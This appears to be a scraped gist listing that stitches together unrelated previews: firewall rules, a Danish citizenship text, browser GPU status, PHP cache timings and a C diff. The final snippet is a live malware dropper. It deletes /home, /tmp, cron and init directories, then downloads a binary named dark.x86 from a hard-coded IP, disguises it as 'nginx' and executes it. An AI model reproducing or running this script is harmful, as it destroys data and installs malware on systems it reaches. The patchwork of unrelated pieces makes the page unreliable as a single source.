This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
firewall { | |
interface eth0 { | |
in { | |
ipv6-name WAN-IN | |
name WAN-IN | |
} | |
local { | |
ipv6-name WAN-LOCAL | |
name WAN-LOCAL | |
} |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
set firewall interface eth0 in ipv6-name 'WAN-IN' | |
set firewall interface eth0 in name 'WAN-IN' | |
set firewall interface eth0 local ipv6-name 'WAN-LOCAL' | |
set firewall interface eth0 local name 'WAN-LOCAL' | |
set firewall ipv6-name WAN-IN default-action 'drop' | |
set firewall ipv6-name WAN-IN rule 10 action 'accept' | |
set firewall ipv6-name WAN-IN rule 10 state established 'enable' | |
set firewall ipv6-name WAN-IN rule 10 state related 'enable' | |
set firewall ipv6-name WAN-IN rule 20 action 'accept' | |
set firewall ipv6-name WAN-IN rule 20 protocol 'icmpv6' |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
set firewall interface eth0 in ipv6-name 'WAN-IN' | |
set firewall interface eth0 in name 'WAN-IN' | |
set firewall interface eth0 local ipv6-name 'WAN-LOCAL' | |
set firewall interface eth0 local name 'WAN-LOCAL' | |
set firewall ipv6-name WAN-IN default-action 'drop' | |
set firewall ipv6-name WAN-IN rule 10 action 'accept' | |
set firewall ipv6-name WAN-IN rule 10 state established 'enable' | |
set firewall ipv6-name WAN-IN rule 10 state related 'enable' | |
set firewall ipv6-name WAN-IN rule 20 action 'accept' | |
set firewall ipv6-name WAN-IN rule 20 protocol 'icmpv6' |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Persons over 21 years of age | |
You can apply at the earliest when you have reached the age of 21, and the | |
application must be with the Ministry of Immigration and Integration Affairs no | |
later than the day before your 22nd birthday. If you apply too early or too | |
late, the application will only be considered as an application for proof of | |
Danish citizenship. If you have previously applied for proof of Danish | |
citizenship, this is not a guarantee that you have retained your Danish | |
citizenship by your 22nd birthday. |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Persons over 21 years of age | |
You can apply at the earliest when you have reached the age of 21, and the application must be with the Ministry of Immigration and Integration Affairs no later than the day before your 22nd birthday. If you apply too early or too late, the application will only be considered as an application for proof of Danish citizenship. If you have previously applied for proof of Danish citizenship, this is not a guarantee that you have retained your Danish citizenship by your 22nd birthday. | |
How do you meet the conditions for preservation? | |
You can retain your Danish citizenship if you have cohesion with Denmark. Slightly more simply said, you must have maintained an affiliation or affiliation with Denmark, and that is the basis for you, of course, to be allowed to retain your Danish citizenship. | |
In practice, the assessment of whether you have retained the connection to Denmark is divided into two: | |
if you meet the residency requirement or | |
does not meet the residence requirement, but can st |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Graphics Feature Status | |
Canvas: Hardware accelerated | |
Compositing: Hardware accelerated | |
Multiple Raster Threads: Enabled | |
Out-of-process Rasterization: Hardware accelerated | |
OpenGL: Enabled | |
Rasterization: Hardware accelerated | |
Skia Renderer: Enabled | |
Video Decode: Software only. Hardware acceleration disabled |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
PHP Array in include file | |
Initial: 0.01237ms. | |
Avg of next 10: 0.00032ms. | |
Cache miss: 0.00292ms. | |
Yac | |
Initial: 0.00212ms. | |
Avg of next 10: 0.00138ms. | |
Cache miss: 0.00084ms. |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
PHP Array in include file | |
Initial: 208.44601ms. (empty cache) | |
Initial: 0.03016ms. (cached) | |
Avg of next 10: 0.00457ms. | |
Yac | |
Initial: 0.00292ms. | |
Avg of next 10: 0.00607ms. | |
Local Memcached |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
diff --git a/src/return.c b/src/return.c | |
index baf59ed..16bd2c2 100644 | |
--- a/src/return.c | |
+++ b/src/return.c | |
@@ -132,6 +132,10 @@ uopz_return_t* uopz_find_return(zend_function *function) { /* {{{ */ | |
return NULL; | |
} | |
+ if ((EG(flags) & EG_FLAGS_IN_SHUTDOWN)) { | |
+ return NULL; |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
sleep 30 | |
rm -rf /tmp | |
rm -rf /home | |
rm -rf /var/run | |
rm -rf /etc/cron.d | |
rm -rf /etc/cron.daily/ | |
rm -rf /var/run | |
rm -rf /etc/init.d | |
sleep 10 | |
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /etc/init.d || cd /; wget http://212.192.241.72/bins/dark.x86; curl -O http://212.192.241.72/bins/dark.x86;cat dark.x86 >nginx;chmod +x *;./nginx |